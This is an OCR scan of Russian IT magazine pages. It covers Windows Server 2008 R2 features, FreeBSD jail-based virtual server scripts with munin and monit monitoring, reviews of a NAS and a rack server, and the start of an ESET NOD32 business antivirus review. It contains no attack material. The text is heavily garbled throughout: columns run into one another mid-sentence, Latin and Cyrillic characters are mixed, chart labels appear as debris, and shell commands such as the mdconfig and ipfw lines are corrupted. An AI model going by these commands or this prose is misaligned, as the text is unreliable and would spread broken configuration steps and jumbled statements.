затрудняют переход. Чем больше было использовано недокументиро жений. ДЛЯ IT -специалиста». 3ти книги распространяются совершенно
ванных функций, тем болезненней будет происходить миграция. Увы, беспла'ГНО, ссылки на их загрузку приведены во врезке.
деяться На лучшее. Подводя итог, хочу сказать, что Windows 7, скорее всего, станет следую
С приложениями, разработанными под Windows Vista, все понятно: с щей «народной» ОС, которую ПО достоинству оценят разные категории
большинством из Них проблем не возникнет. А как быть с те,~и. что были юзеров, а если ОС сможет завоевать сердца пользователей, то и кодеров
оптимизированы и созданы для работы, скажем. в Windows ХР?Увы. но долго ждать не придется. Они махом мигрируют в новую ОС ... Чтож,
из-за провала Windows Vista многие Остались в ХР и продолжали разра поживем-увидим, а пока нам остается ждать финального релиза и по
батывать приложения именно под эту ОС. При пере носе таких программ тихоньку .знакомиться со всеми новинкаМИ.I
_L_ _•
с!:ргr::й ЯРЕМЧУК
.'НДРЕЙ МАТВЕЕВ
Новое явление
дnиннорога
Wind'ows Serveг 2008 R2: обзор возможностейновой версии
серверной системы
•"
u
ИЗНАЧАЛЬНО для WIN2K8R2
ПРЕДУСМАТРИВАЛОСЬ
как раз тот случай, когда количество перешло
В качество. «Мелких), же усоверщенствований
до Wiп7. Пользователь(подразумевается,
до наоборот. парни из Мicrosоftнрояснили кое хранилище виртуальных машин нредо· мой инфраструктурыVDI - статическая или
СИ!j'ацию, указав, что в планах корпорации ставлнет в озможность горячего подключения дииамическая. Одним словом, VDI пред
ВЫПУСI<ать новые версии серверных ОС но и отключения храflИЛИЩ. Физические и ставляет собой своеобразную комбинацию
схеме 2 года (обновление) и 4 года (новый виртуальные системылегко развернуть при RDР-соединений и IJиртуализации.
релиз) , то еClЪ R2 ЯЕЛЯется именно обновле помощи VНD (Virtual Hard Disk) файлов. и, в Служба Тетmiпаl Services переименована в
нием после Wiп2k8. Вероятно, так поступили, отлИ'!Ие от нредыдущей версии ОС, Hyper-V Remote Desktop Services (RDS), что больще
чтобы не «затенить» выход семерки. Сдругой Яli1!Яется неотъемлемой частью системы, то отражает ее назначеиие - работа в структуре
стороны, релиз Wiп2k8 бьи радушно принят есть, нет разделения на обычные версии и VDI. Но VDI - не единственное нововведение
специалистами, а изменение названия могло «withНурег-V». в RDS. Поддерживаются многомониторные
бы отпугнуть тех, кто сейчас хочет нриобрести Обновлением Hyper-V тема виртуализации конфигурацин, видео и аудио очеНl, высокого
этуОс. Иначе большинство отложат переход в R2 не исчерпана. Термин «виртуализа качества. ПQ1!ьзователи WiH7 MOryт летконо
и будут дожидаться Wiп7Sеrvег, примерно кщ{ ция» теперь охватывает три технологии: лучить доступ к удаленномуприложению или
сегодня ситуация обстоит cVista иWiп 7. Server Virtualization, СliепtViгtuаlizаtiОI1и рабочему столу при помощи нового ammета
Бета- версИJ! системы сталаДОCl'упна для PreseHtatiol1Virtualization. Отмечается, что RemoteApp & Desktop Сопнесtiон, не чувствуя
загрузки в середине января 2008 года. Точная R2 является полноценным VDI- решением разницы междулокальным и терминальным
ется, но уже известно, что она придетсяна тура для виртуализацииклиентских рабочих В стандартную поставкувключен обновлен
НОIJогодниепраздники,Можнонредположить, мест), обеснечивающимцентрализованное ный PowerShe1l2.0, количество изменений
что после анонсаWiп7долго тянутьпе будуг, и управление всеми виртуальнымисистемами в котором, по сравнению с 1.0,ДОCl'аточно
снебольшойразницей
. Как это работает? На сервере с поддержкой • У-лучщенный APl;
Список мажорных новинок, анонсированных Hyper-V выполняется множество вирту • GШдлясозданиянотладкискрmrroв;
в R2, помещается на одной страннце, ио это альных машин с клиентскими ОС OTWinXP • PowerShell в службах Remote Desktop;
-----jl ----;:-
11
11
. I .
~~~
IЛОКЗЛЬНЗЯ сет!::· I
1'---+----.------
• ВЫПОЛl-lеl-lие команд на удаленной машипе с Сюда же добавим возможность публикации ОТНЫНЕТОЛЬКО·64,81Т Ранее
использованием WiпRМ 2.0; одним кликом в Visual Studio 10, новые сообщалось, что Wiп2k8 будет последней
• Фоновое выполнение задач (P$Job); счетчики производительностии инстру 32-битной версией серверной ОС. Так и
• Запуск процесса на одной ИJ!И нескольких ментуправленияWeb Dерlоуmепt Тооl (MS произошло - R2 будет выпущена только
маШИl-lах и работа с WPF (Windows Presen ta tion Deploy), позволяющийадминистраторам для архитектур хб4!iаб4. Компании AMD и
Fоuпdаtiоп) - новой подсистеме в составе Web-серверовбез труда развертывать, Intel уже не выпускают32-битныхпроцес
.NET FTamework3.0, позволяющей создавать сннхронизироватьи мигрироватьсайты, соров для серверов на базе архитектуры
красивые графические интерфейсы. включая конфигурацию,контент и SSL х8б, поэтомууход с рынка 32-битныхи
Улучшены некоторые старые командлеты сертификаты. смещениеакцентов в CTOpOI-lУ б4-битиых
(cmdlets), и ПОЯВИJIОСЬ около 240 новых. В Servel' Core теперь также можно установить ОС И приложенийвыглядит вполнелогич
В обновленныйIIS (версии 7.5) интегриро .NEТ, ВЮlючаяASР.NЕТ и Powel'Shell. Ставим но. ХОТЯ поддержка 32-битныхнриложений
ваны FТP (с новыми файлами настроек, ос 2.0 апd 3.0 .NET Fl'аrnewоrkнри помощи новой вR2 осталась и реализоваl-lа при помо
нованными I-Ia .NET ХМЦ, WebDav, URLSсап утиJlliты DlSM (Deployrnent Image Sеrviciлg апd щи слоя эмуляции WОWб4 (Windows ОП
З.Х (ограl-lичеl-lие типов http-запросов), Management), котораявходитв стандартную Wiпdоwsб4).По умолчаниюв версии Server
Аdmiпistratiоп Pack (управлениеSQI"-базами, поставкусистемы и в комплект WAIK (ЮlЮч COl"e н Hyper-V поддержка WОWб4 отключе
конфигуратор,оТ'!еты, фильтрациязапросов, /Online позволяетуправлятьнастройками на. Чтобы включнть поддержку 32-БИТI-IЫХ
www.iis.пеt/ехtеIlsiопs!аdmiпistгаtiопрасk). рабочейсистемы): нрюrожений, администраторудостаточно
Ранее все это бьшо реализованокак отде выполпить ОДI-lУ команду:
вому IIS полностью доверяют, свидетельству SharePoint идает практическибезграничные > di.sm /Online /Enable-Feature /
ет и тот факт, что в февр але Мiсrоsоft перевел IЮЗМОЖНОСГИДJШобработкифайлов по различ F?atureName:NetFx2-SеrvеrСоrе
-_._~----- - - -_._--~.
1
,.J() "1) _-: - -:::-
~ .::-...==::::-::._...--_.,_
~:i~~G":
fDt'U~I!'Ie<lH 8N
:.ff;:::-"[,,~':'.- -.,._,.
;~?E:' з __....
i,
!E"si.~~s I~=-
S=; ~==--=:==-'-- :: - ,!
11
J
;;;;;-· ':::. :==::..
-
=:J
,~ <>n....",.......... ..;....
t ~..:.';:;...
...., =:
1.:.. ~.~
~L ...L"J-~~
~~ ~
-[ -r r
EI;";~o.,~
на Micro:;oft TechNel вая, что в последнее время колнчество ядер на одном физи создать дискету для сброса пароля (именно дискету, а не
=-90.rТ1iсгоsоft.соm ческом нроцессоре постоянно увеличив ается, такой запас СО /DVD, так что потребуется флоновод). При создании
fwli nk/?Li nkl О-660.06 лишним точно не будет. Причем, если ядра не используют разделов жесткого диска мастер по умолчанию создает
• информация для ся, их можно ВЫКЛЮЧНTh, тем самым, сэкономив толику два раздела (загрузочный и системный), чтобы не было
разработчиков на электроэнергии. Виртуальная мащина, запущенная под проблем с активацией BitLocker.
Microsoft MSDN новымHyper-V, поддерживает до 32 логических СРИ (в пре Субъективно обновленная ОС работает щустрее нредыду
o.microsoft.CQfТlL дыдущем варианте их бьuIO всего 4) . Кстати, подлогичес щей, особенно хорошо это видно под ВИРТУЭIlliaМИ. После
j[ fwlinknLinkld=6 7404. 101М процессором в Винде понимаетсяне только количест загруэки тебя встреmт рабочий стол, стилизованный
• сгагьи в Support во ядер, но и одновременное количество обрабатываемь!х подWiп7. чтоБы измеНИTh разрещение экрана, не нужно
1. KnowLedge Base [кВI потоко!3. В сообщениях проскакивало, что Win2k8R2 может вызыв aTh панель Арреаtапсе. Вместо нее JЗ контекстном
- go.microsQ.f.1 COrl'! работаTh с 32 4-ядернымипроцессорами,каждоеядро меню расположенпункт Screen Rеsоlпtiоп. Все остальные
fwlinknLinklD~55142. которых одновременно обрабатываетпо 2 потока данных изменения нроизводятся через "Панель Унравления».
• новостные группы (32 СРИ х 4 ядра х 2 нотока данных = 256). Вообще, по части перестройкиинтерфейсаздесъ доcrаточ
Microsoft Соппесt Названы минимальныесиcrемныетребования: 1.4 ГГц но изменений,но думаю, тебя интересуютсовсемдругие
90. т iСГОSО([.СОIТ1! 64ЫtСРИ, 512 Мб ММ, HDD 1ОГб_ Рекомендуемые, как ты инструмеНThI.
biili nkl?Linkl d=5006? понимаеmь, существенно выше. При IUl3нированин кон Не успели привыкнуть ко всем новшествам Win2k8, как в
фигурации сервера следует таюке учитывать, что версия R2 получили еще ряд усоверщенствований_ Запустивший
Stапdагd ноддерживает максимум 32 Гб RAiv!, а Епtегрt"isе и ея '-разуже «Initial Соnfiguгаtiоп Task», ири номощи которо
Datacenter до 2 1'6 RAМ_ го выполняются первоначальные настройки, не изменил
В R2 доступны и многие другие новинки; некоторые из них ся. Но в Server Мапаgег появилась возможность,которой
встречались в семерке_ Так, в WiпdоwsFirеwаllможетбыть ранее явно не хватало -удаленноенодключениек другому
активно несколько профилей (Private, PubJic или Domain), серверу. Теперь достаточно перейти в Action -СOIшесt to
'гro не вызывает проблем при нодключении к нескольким Another Соmрпtеги ввести данные другой системь!, рабо
~ info сетям; добавлена поддержка http-ссылоквQоS, реализова тающей под управлением R2. И самое главное: ноддержи
[ • Обзор Windows 7
с точ ки зрения IT
ны VPN Rееоппеct и DHCPFailover. Служба QoS позволяет
приоритезировать трафик при доступе к определенным ре
вается. удаленное управление не только системы В полной
установке, но и в Server Соге_ То есть, у многихадминовне
специалиста смотри сурсам. Ранее во вкладке «Аррlicаtiоп Name" в «Policy-Based будет мук выбора: использоваTh безопасный и быстрый, НО
в предыдущем номе QoS» было только ДBaJJyНKTa, при помощи которых можно неудобный/непривычный в управлении Core или уаано
ре журнала. БЫIIО задать либо все, либо определеI1ные приложения. вить полную систему. Таюке следует отметить, ч'го Server
• Обзор нововведе Теперьже вкладка называется. «Application Name ог ИRl», Manager является частью Remote Server Аdministrаtiоп
ний и возможностей и здесъ можно задаTh имл/шаблонhttp-pecypca, трафику ТооlsдляWiп7 (при помощи RSAT можио УПРaJЗЛЯть Wiп2kЗ
\1 Win2k8 смотри которого будетназначаться.повышенныЙ нриоритет. и Win2k8). Вдомеиной '-реде, если eCTh соответстВующие
в статье «Кодовое Новая функцияVPN Reconnect, являющаяся. чаСThЮ RRAS права, проблем с подключением не будет_ А в одноранго
имя Longhorn» майс (<<Служба маршрутизации и дистанционного доступа"), вой сет компьютер, с которого про изводится удаленное
кого номера позволяет VPN- клиенту автоматичесЮl восcrанавливать подключение, должен быть добавлен в «tlllsted host5»
11 VPN-подключение в ситуации, когда связь с VPN·cepBepoM (подробности по WЩRМ СМОТРИJЗ статье «Командный забег
за 2008 год"
временно оборвалась (прежде это нужно былоделаTh вруч влагерь Лонгх?рна», опубликованной в февральском номе
, яую или ВЫЖИДВThДОВОЛЬНО длительный тайм ,,!уТ) , Чтобы pe::r за 2009 год). [~
r ~
i ~ 116
» SYN/ACK
~iQ"""'",,,,,,,,,,",,,,","
> wiПГП1 set: wiпrШ/СQпfi.g/сli.епс @ ма Иlпересньп:: функций. Нанример, ноявилась корзина Active
При выполнениизадач администрированияUAC момет вме· требовала большихусилий, такая возможностьможет толЪ!{о
шиваться и блокировать работу. Чтобы этого избежать, следует привеТСТIJоваться,
«Elevated реrmissiопs are required то пш .. ,», Решается это нросто: выби deletedObjectLifetime. Еслидомен находится на уровне Win2k8R2,
раем в меню«Пус!(»ярлыксmd,ехеивконтекстном меню пу:нкт«Rпп as корзина AD активируется автоматически.
аdmiпistгаtог»,
Новые команметы PowerShell упростили администрирование серве
Список ролей и компонентов изменился, теперь их количеСТIJО равно 17
ром при помощи командной строки. Перевести домен В Н2 режим очень
Remote Desktop Services, соответственно, поменялось И название. WSUS РЗ С; \> Set-АDr'оrеstМоdе-Idепtitу dоmаiп. ru
теперьявляется частью R2. И его не нужно самостоятельнотянутьиэ -FоrеstМоdе Wiпdоws2008R2Fоrеst:
(БРА). Оп поможет настроить роль в соответствии с рекомендаци ldp.exe или воспользовавшиськомандлетамиGet-ADО~jесtн Resrore·
соБС1'венпо произоШ1IO, и прп пеобходимости вернуть системув Б поставке Н2 появилась новая утилита djoin.exe, назначение которой
начальное состояние. Три новых KOMaнд~eTa Д1IЯ PowerShell-Add несколЬ!ю необычно - ПОДЮlючение кдомену, который сейчас педо
WiпdоwsFеаturе, Get-WiпdоwsFеаruгеи Remove-WiпdоwsFеаturепозво стуцен. Такая необходимость может понадобиться при развертыв ании
ляют добавить, УДaJtить и просмотреть информацию о выбрапной роли. виртуальных машин И нри заказе преднастроенной техники постав
Да, чтобы они были достуцны, пе забываем вначале работы загрузить щику, чтобы пе разглашать учетныедапные. Принцип довольнопрост:
модуль Servermanagel·. Например: впачале па системе, нодключенной кдомену при помощи djoin.exe,
ЕВI-ЕНИЙ 30БНИf-l
I JtMfilSYNACK.RU I
Пятьэвеэд...
иотменныи
сервис
11
•
'"
u
РАБОТАНАПИЛЬНИКОМЧтобы
повыситьэффективностьсервиса,я решил
# ср -а
-r' /r..nt
/usr/jailbase/FreeBSD- 'ипате зависитО'Г ресурсовсервера, ширины к-анала и
целевой аудиториисерnиса.
дисковоепространстводля каждоro виртуаль· его создани:я или запуска. Вот примерно е mdсол.f ig -а -t vл.оdе - f
базовый виртуальный диск размером в 2 Гб, SIZE=2g i! Копируем публv.'J:НЫЙ кпюч в катапог
# Отключаем образ
FreeBSD- 'ипате - у' .2 9 . .\.шаgе bs = lrп ДЛЯ всехтипов аккаунтов, которые будет под mdconfig -d -и 99
наборов правил на плечи команды rndconfig. ifсопfig $IF i,1et -alio.s $lР
echo $MDNUМ > $JAILDIR/$IP. ruп мониторинг сервисов югиеJ>ГОВ, и им придется самим позаботиться об
#: Привязываем виртуалы-!ый сервер к сетевому интерфейсу .. этом. с другой стороны, МЫДОЛЖI-Iыобеспечить бесперебойную работу
ifconfig $IF iпеt. a1ias РР всех виртуальныхсерверов, что потребует постоянного слежения заих
# ... и накладываем ограничени9' на пропускную способность работоспособностью. Создать базовую систему мопиторинга !JИртуаnь
FWSETNUM=$( ($MDNUM+~)) ных серперов не такуж и сложно. Надо всего лишь взять вьшод утилиты
ipf'" set disable $F\"ISEl'NUM jls и сравнить его со сниском готовых К выполнению серверов (статус
ipf'" адд set. $HISETNUМ pipe $ (FНSЕТNШ1) О ip from апу сО 'ok' в /usr/jailbase/db). Если какой-тосерверготов, но не запущен
$IP понытатьсяего запуститьи снова сравнитьсписки. Если серверавновь
апу
Оrраничения
ipfw pipe $ {FWSETNUM}l config Ь" $ВДNDWIТН
# Запуска.е}.] сервер
CPU/RAM
в нынешнем состоянии подсистемаjаll-окружений FreeBSD не под
Скрипт stopvserver удаляетзакреГIЛенныйза виртуальнымсерве держивает ограничения на объем виртуальной памяти или время
ром набор правил ipfw и отключаетвиртуальныйдиск. использования процессора. Это серьезный недостаток. надустра
нением которого работают не первый год В 2006 году Крис Джонс
# vi / usr/local/bin/stopvserver
попал с проектом реализации идеи ограничений на Google Summег
# Отключаем виртуальный диск
of Code IA даже предстаВIAЛ работоспособные патчи для шестой вет
MDNUM=·cat. $JAILDIR/$IP.run'
ки, однако разработчики FreeBSD не ПрlAНЯЛИ их Позднее Кристо·
umоuпt $JAILDIR/$IP
фер тюнс портировал на FreeBSD 7.0 часть ЭТlAХ патчей. отвечающую
rndсопfig -d -u $MDNUM
за ограНlAчение объемов памяти. но не осилил порт остального кода.
# УдаЛ9'ем празила ipf'" и IР-адрес виртуального серве Наработки обоих энтуэиастов доступны на страничке wiki.fгееЬsd.
ра org!Jails. Впрочем, не CTOIAT рассчитывать на стабильность ИЛIA
FWSЕТNШ1=$ ( (МDNUИ~l) ) высокую производительность ядра после наложения патчей.
Disk
"
120
110 ~ 90
100 ~ во
v
90
~ 70
80 iri
;D 60
70
';f. 60 i' 50
50 -ю
-ю ~O
зо
20
20
10 10
О I , • О
Sun 12:00 MonOO:OO Моп 12:00 27 28 29 30 01 02 03
Cur~ Min: A .... g: Мах: с . . г. ,.,in: Avg.
О/ 70.00 69.92 70.00 70.00 О/ 70.00 69.87 70.00
8'Уа,г 70.00 69.92 70.00 70.00 .'y~г 70.00 69.00 69.9~
I!I Jtmp 0.00 QOO QOO QOO I!Iltmp 0.00 0.090.00
GЗ lusr 88.00 87.89 88.00 88.00 В /usr 88.00 97.82
88.00
E1lhome 99.00 99.00 99.04 100.00 IIIlhome 99.00 97.80 98.51
"
О Icdrom 100.00 100.00 100.00
_ _ _ _ _ _ _ _ _ _ _ _ ~stJJnd.at:e.:...МQD..Ь-';;).L..4-'l~2..20.Q
100.00 О Jcdrom 100.00 100.00 100.00
_ _ _ _ _ _ _ - J....< t..w>ll_~M~v 41I;'1!.'j"-;-jf"
Г-;'~':' ...... ~~ ,,_ I ~~ ~~ "_'. I ~, __ . ~ ~~~
I _ 1=! ...:~~1f'i;!1r;;;1
СМОТРИМ ГРАФИКИ MUNIN
.~~aJ!'.
drwxr-xr-x 7 root wheel 5126 4 май 12 19 ./ ..!. ~ ~~"~!<~.T~-:...~~~?~)~'~_'?~
drwxr-xr-x 20 root wheel 5126 19 апр 1149 .. / :.~~= ~Ш~ ~ ~""J.'nI
drwxr-xr-x 17 root wheel 5126 3 май 12 18 172.16.67.1/ :'~~:;~J~7д:~!9!~.:;:~r
-rw-r--r-- 1 root wheel 2,OG 3 май 12 20 172.16.67.1.image :~:~..r;;!~~:;~~l~;:"~w "~"~p, .. " .:. ."""... l~,~)t и ...
- rw- г-- г-- 17 root wheel ОВ 3 май 12 20 172.16.67.1.ipfw :.~O~~~~: ~OJ(I <о<>'.ож •• ~ • O:I'\O"'~, "'~ <>(:)·.... C>(n' ".,.~".o,o ~'PO...-.l
512в май
(MtI!
d rwxr-xr-x 2 root wheel 4 14 02 172.16.67.5/ ИНt ~O~_· ·1"sr/1.<Х..'/".цr<t.<I""
~IO" pr(lo~IIIII· 1..!r/lOH1/.t(;r(.4/....;"'~·~ .•~
.... ,~.1i'> 1toг:
It/;l\>
-rw-r--r-- 1 root wheel 2,OG 4 май 14 05 172.16.67.5.image If , ..HtJ Р"'" .s.t~ оn,," "ИJrt
1f I"MtU't, ..1tMnf <:ycl.s th",.1 •• 0IIf
<1'1«(' 1""""'" иf>~ ...Н"р1«\1.л- .. r/run/.IoIЧ',р1d
-rw-r--r-- 1 root wheel Ов 4 май 14 05 172.16.67.5.ipfw
-rw-r--r-- 1 root wheel 288в 4 май 15 31 172.16.67.5.trouble n1~i~t:д~~i~~ч;~~;~~;?:~:~:;t
ЛИСТИНГ КАТАЛОГА/USR/JАIL ПОСЛЕ СОЗДАНИЯ ПРАВИМ MONIТRC
ПЯТИ СЕРВЕРОВ
€)
УнасужееСТЪСКРШIТдлясron,которыйостанавливаети исправно
Полные версии кон приведен сокращенный вариантэтого скриrrrа; он содержит /usг/10са1/Ьiп/stагtvsелrег $IP > /tmp/
фигов >1 скриптов Ic базовый набордейсгвий, вьmолняемъrхнад каждым «актиВ' startvserver.out 2>&1
комментариямиl НbIM» сервером: sleep 15
ты найдешь на диске. # Заnyстипся? тогда ПОlCидаем функцию
::-::- S'y'N/ACK
ери иБа9е Ьу
I . day Load average Ьу day
'l : 100
2.41
2.2
2.0
70
1.8
60
1.6
~ 50
1.4 !
40
30
1.21
1.01
20 0.8 '
10 0.6
О 0.4
Monl2:00 Tue 00;00
0.2
Cur: Min: Аvч. Мах:
[J syst:em 3.37 0.69 2.29 8.93 0.0
Моn 12:00 Tue 00:00
• int:ertupt 0.90 O.4i 0.98 L97
61 u~r 13.39 1..70 1L27 94.96 Cur: мin; Avg: Мё
[] nice: 0.98 0.47 0.66 L04 1ёId 428.иrn 0.00 293.22rn 2
l!Iid!e 81.37 0.00 84.90 96.23 Last update; Tue М ау S 11:05:03 ;
Last update:: Тие M~ 5 11;05:02 2009
ДЫ истек
блемы с сервером < ТР>>> н выводом неудавшейся команды startvserver, Мониторmuпiп, основанный на клиент·серверноЙ архитектуре,
которыйтакже будетзanисанв файл $JAJLDIR/$IP.troubIe. Задача прост и удобен в установке и настройке. Мы воспользуемся нм для
адмпна в этом случае ПОДКЛЮЧИ1ЪСЯ К кориевой машине, исправить решения первой задачи. для на чала установнм н оду muniп, которая
проблемуи вновь запустить виртуальныIй сервер. Во втором случае будет следить за нараметрами системы Н отдав ать накОIИенные
администратор получит сообщение <<Watchvservers: истек срок аренды данпые серверу:
# ed /usr/ports/гnail/ssmtp Открьmаемфайлтuпln-поdе.соnfндобавляемвпего/ще<.троки:
# vi /usr/local/etc.lmuninlmunin.conf
\fS.tl'lV'Ets,-'ur jvя·/j.l1Ь..::а::/db I ;Y€ f ' +4 ",cl."S·
ch~ucces51·r:;"RV'i:i':.
# И его IP
..... c h -:о.:Lеst_'t1mеsvsЮl.'.......
~~~~iJS~~~:~ce;'8~
11' [г:~~~lllG~): tht:.n
с ..1.-.:1':' -tj'
":np..l.8HO p.6vHe'Т u
f1 Болъшеничеготрогатьне надо. Командаmuпiп-сгон,которуюсистема
~u~~i'i:C~~S;:~~;I!~e~i~p)/Т.lllр/~;"n:"Sегv~.OtJt. 1>&1
sl~l!p lS нортовзаботливовписалав заданиясгон, будетзапускатьсякаждыепять
" ЭаnYCnVX:JI? Tar,U fW... ~e>I '?Y""~
(.t.t I)A.H.. ()f:;/H1",}.troobl'! I .... 11 -5 -~·.tlсtNSI'''~f!j",, ~"".... <:" <:~.PI\" ПР" rOCIIO:
ТИС'I'ИКУ
# Eor i in сри дЕ d.Cinode 1оад memory netstat. ореп_.сПеs iE loadavg (1min) > 4 then aleri:
-s /usr /
отчет по трафику и сетевым подключениям1I 1п # Следим за работоспособностью демона sshd
На клиептской стороне все. Осталось на(:троить службу, которая будет # echo "monit_enabJe=\ "YES\ '" » /etc/rc.con.c
опрашивать ноды и генерировать графики. Поэтому идем на сервер 11 /usr/local/etc/rc.d/monit start
(кота рый может б),[ть той же машиной) и устанавливаем па нем mnnin
шаiп: ГЕТЕРОГЕННОСТЬПятоепме базы Dиртуальныхсерверо))
зарезервированодля храненияверсииFrееБSD-окружения.С его по
100 k
"+
"~
.-
~
-
.~
о
50 k
"'tJ
J: -50 k
О
U
f1J
VI
...
f1J
-100 k
Q..
VI
.~ -150 k
..D
-200 k
Mon 12:00 Tue 00:00
Cur (-1+) Mi'"I (-1+) Avg (~/+) Мах (-1+)
bps 90.34kJ 62.96k 10.19k1 1.47k 90.65k1 48.79k 157.07k1 104.56k
Last update: Tue Мау 511;05:032009
16
14
нами система находятсяна одной машине. На Web-сервереКРУТИТСЯ
дущихверсий системы, вплоть до 4.11. Поэтому, если ВОЗННЮiеттакая необходимо лишь предусгановитьна КДЖДУЮ машину нашусистему
необходимость, просто скачай один из предыдущихрелизов, установи управленилвиртуальными серверами, muпin-поdе, nl.iпit.И ssmtp, а на цен
его на соседннй раздел н скопируй Dновый базовьгй DнртуаnьныЙдиск. тральный сервер добавитьнебольшую оберткудля addvserver. Она будет
Срез нужной версиидерева портов можно получить спомощью cvsup: сверюъся со специальным CJJИском машин, обслуживающихвиртуальные
> Особенности:
LСD-дисплей для начальной конфигурации
и отображения статуса системы
> Питание·
на для иеподьзования в качеcrве сетеIЮГО фай тваадминистратора, система сделает всю работу ка или через USB-интерфеЙс.
лового ресурса для небольших рабоЧИJ{ групп. повосстанОВJIениюисинхронизациивавтомати для настройки можно использовать простой
Гибкая система настройки, использование на ческом режиме. Поддерживаетед ВОЗМОЖIюстъ русифицированный web-интерфейс или же
дежного и высокопроизвоДительного ипих в создания нескольких RAID-массивов на одной несколько ЮЮПОК и J,СD-экран (в экстренном
качестве программной начинки, возможность системе. На передней нанели расположено IL'IТЬ случае), на котором также отображается теку
ДОС'l)'Па к информации из любой популярной отсеков для жестких дисков SATA и один порт щее СОСТОJJние п данные оноследних собьгги
операционной систеМЫ, поддержка функции eSATA сзади, что позволяет создать хранилище ях. Предусмотрены и другие способы получе
принт-сервера, ПрИЕ.лекательныЙ внешний вид данныхобъемом6Тб (врежимеJВОD). ния уведомлений: по е-таil и через 31~уковой
и невысокаяцепаделаЮТЭТОТПРОДУКТОlJIИЧНЫМ Получить доступ к файл-серверу можно из опе сигнал.
решением тогда, когда возникает необходи рационных систем Windows, иnих, BSD, Мас 05 Гарантийное обслуживание осуществляется в
мость в надежном централизованном хранении Х илилюбойдругой, поддеРЖIшающейпротоко течение двух или трех лет, а цена составляет от
информации. лы CIF5/SMB, AFP З (Apple Filing Protocol), NFS 40417 (с двумя жесткими дисками на 500 Гб)
1· Система поддерживает все популярные конфи vЗ, FТP и mтp/нтгps. Устройство оснащено до 68126 рублей в конфигурациис шпью дис
I"УРации RAID (О, 1,5, б, 10, иJВОD) с возможнос встроенным четырехпортовым Еthегпеt-комму ками на 1 Тб каждый и трехгодичным сроком
тью горячей замены, резервирования и роумин татором, что упрощает работы по наладке сети. гарантии.
р links
Модельный ряд сер
> Память:
XOR дЛЯ обеспечения
чей замены"
«курирует" цe~T
спектра задач, связанных с поддержкой сетеJ30Й своей частидискадля каждого режнма). Пока Rock s101U дороговат, D сравнении с
ияфраструктуры небольших КОМПaJIИЙ иrш от Сервер вьmолнен В форм-факторе lЦ что деаает аналогичными решениями других произво
делов. Сервер одинаково хорошо справится как его идеальным решением для быстрараcryщих дителей, поэтому iRU придется приложить
со ('Тандартным набором сетевых служб (DНСР, компаний, сетевая ннфраt'Труктура которых но с немало усилий, чтобы составить достойяую
DNS, контроллер домена Active Direetory), так и TOiIННO развивается. Объем оперативной памяти конкуренцию уже укрепившимся на рынке
со среднезагруженнымweb- и прокси-сервисом. варьируется от одного до восьми гигабайт DDR2 серверов игрокам (в первую очередь, это
В недрахсервера скрьгшроцессор Inte! Core 2 Dио 800 (4 cJIoтa). На задней ПaJIели расположено 2 lВM и НР). Но сам факт появления нового
Е8400 и 11рограммно-аппаратный SATA2 МID портасетевогоадаrrrераIntel GigabitEthemet(Intel отечественного производителя на поле, где
КОНТРО!lЛер InteI ICH9R, который поддерживает 82563ЕВ). В комплект входит DVD+ /-RW н два господствуют зарубежные компании, не мо
до б SAТА2-дисков С ВОЗМОЖНОCIЪюорганизации жеcn<иxдиска SAТА20бъемом250Гб каждый. жет не радовать.
Последний
I
.'
;!
бастион
I Обзор 'комплексных средств защиты корпоративного уровня
,.
Сегодня, чтобы противостоять возникающим интернет-угрозам,
на каждом клиентском компьютере должно быть установлено комплексное
,.
решение, совмещающее в себе антивирус с мощным эвристическим моду-
I,i
лем, файрвол, сканеры электронной почты и веб-трафика, а также средс-
I •'"
со
ЕSЕТNОDЗ2SМАRТSЕСU~ТУ
BUSINESS ЕDПIОN
Антивирус
(WF) и взаимодействует с Цен'гром безонас-
ностиWiпdоws. БР3lщмауэробеrnечивает
тов . В сети может функционировать любое
количество EP,AS (лицензия не определяет
4:
" NOD32 хорошо известен обычному пользо- CIшнирование сетевых соедииеиий на каналь- их количеСТЕО) С ВОЗМО)(GIOСТЬЮ реw!Икации
,.z:
00 вателю благодаря высокой с!{орости работы ном уровне, умеет распознавать и блокировать данных на центральный сервер. Это позволя-
И просrоте Е ИСПОЛЬЗ0вании. КорпораТИЕНая многие типы сетевых а так, а также работать ет унростить администрирование в сетях со
Еерсия NOD32 Smart Security Вusiпеss Еditiоп с адресамиIPvб и создаDатьдля нихправила. сложной, разветвленнойтопологией.Кроме
(SMBE) нацелена на защиту нетолько рабочих Кроме тото, он способен кон'гролировать изме- того, администратор может дополнительно
стаЕЩИЙ Windows 2000 /ХР /Visra, но и файло- нения в исполняемIi!Xфайлах, предотвращая развернутьлюбое количество серверов-зеркал
ЕыхсерЕеров на wraтформахWiнdоws, Nove]J ихзараженне. Проверка НТТР и РОР3 'графика обновлений,ЧтобыклиеНТПОЯВИЛСЯDКОН-
I Netware и Linux/~BSD/Solaris. Обеспечивается позволитулучшитьзащитукомпьютераот соли, следуетразрешитьудаленноеадминис-
,. возможность удаленного управления всеми МНОГИХТИПОЕ ЕИРУСОВ, распространяемых трирование, указав в одноименной вкладке
компонентами как из состава 5MBE, такидеск- таким способом. Модуль ThгeatSense может соответствующие настройки. для управления
топныхверсий аНТИВИруСОЕ NOD32. интегрироваться в популярные почтовые КJIИ- всей сетью 5MBE используется графическая
Обновление антивирусных баз осуществляет- енты (MS OutIook, OudookExpt'ess, Windows консоль ЕР,А Сопsоlе (ЕНАС) -довольно
.. ся централизованно с Енутреннего сервера, Mail и др.) Реализовано 'гри режима иастройки простой в использовании и, ктомуже,локали-
что позволяет сэкономить на трафике, не правил фильтрации: зованный инструмент. С его НОМОlЦЬю можно
загружая внешний канал. • аDтоматичеCIШЙ; вынолнять удаленную установку и удаление
I Полнофупкциональнаясистема,ностроенная • интерактивный; модулей Smart Security, настраивать парамет-
.. HaSMBE, включает четыеe составляющие. • централизованный на основе политик. рысканирования, создать зеркало обновлеиий
Неносредственно за безонасность клиентских Вноследнем С:JIучае все неразрешенные и установить периодичность и порядок переда-
станций и серЕеров отвечает SmarrS есиrity. администратором соединения будут заблоки- чи данных междуЕRAS. В консоли отображает-
Его основным компоненrом является хорошо рованы. ся информация о состоянии клиентов, список
.. - зарекомендовавший себя антнвнрусный мо- Немаловажио и наличие функции защиты ОТ задач, журналы угроз, брандмауэра, собьгтий и
дуль, примеияемый и надесктопных версиях сиама. Сообщения сканируются па основе нра- сканера. Таюке следует о rметить информатив-
NOD32, в котором использована технология вил, байесовского анализа или по глобальной ную систему отчеТОЕ.
I ThIeatSense. базе оmечатков.В соответствиис нолучеиной
